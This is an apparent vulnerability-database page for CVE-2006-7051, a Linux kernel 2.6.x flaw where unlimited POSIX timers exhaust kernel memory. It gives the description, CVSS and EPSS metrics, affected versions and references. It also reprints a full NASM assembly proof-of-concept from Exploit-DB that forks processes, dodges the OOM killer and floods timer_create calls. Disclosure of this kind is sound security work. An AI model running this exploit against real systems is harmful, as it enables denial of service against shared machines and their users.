CVE-2006-7051 : Detail

CVE-2006-7051

0.1%V4
Local
2007-02-23
23h00 +00:00
2018-10-16
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The sys_timer_create function in posix-timers.c for Linux kernel 2.6.x allows local users to cause a denial of service (memory consumption) and possibly bypass memory limits or cause other processes to be killed by creating a large number of posix timers, which are allocated in kernel memory but are not treated as part of the process' memory.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 1657

Publication date : 2006-04-08 22h00 +00:00
Author : fingerout
EDB Verified : Yes

;nasm -f elf noHeaven.asm ;ld -s -o noHeaven noHeaven.o section .text global _start count equ 8 ; threads count - do it quicker _start: mov ebx, count call create_threads jmp done _pause: mov eax,29 int 0x80 ret create_threads: mov eax,2 int 0x80 test eax,eax jz consume dec ebx test ebx,ebx jnz create_threads ret consume: setsid: ; so we won't get counted as one thread in oom_killer() xor ebx,ebx ; each task will have about 20 oom_score which mov eax,66 ; is less than 'init' and others int 0x80 push eax loopek: mov eax,259 mov ebx,0 mov ecx,0 mov edx,esp int 0x80 jmp loopek done: xor ebx,ebx mov eax,1 int 0x80 ; milw0rm.com [2006-04-09]

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version 2.6.18.0

Linux>>Linux_kernel >> Version 2.6.18.1

Linux>>Linux_kernel >> Version 2.6.18.2

Linux>>Linux_kernel >> Version 2.6.18.3

Linux>>Linux_kernel >> Version 2.6.18.4

Linux>>Linux_kernel >> Version 2.6.18.5

Linux>>Linux_kernel >> Version 2.6.18.6

Linux>>Linux_kernel >> Version 2.6.18.7

Linux>>Linux_kernel >> Version 2.6.19

Linux>>Linux_kernel >> Version 2.6.19.1

Linux>>Linux_kernel >> Version 2.6.19.2

Linux>>Linux_kernel >> Version 2.6.19.3

Linux>>Linux_kernel >> Version 2.6.19.4

Linux>>Linux_kernel >> Version 2.6.20

Linux>>Linux_kernel >> Version 2.6.20.1

References

https://www.exploit-db.com/exploits/1657
Tags : exploit, x_refsource_EXPLOIT-DB
http://securityreason.com/securityalert/2287
Tags : third-party-advisory, x_refsource_SREASON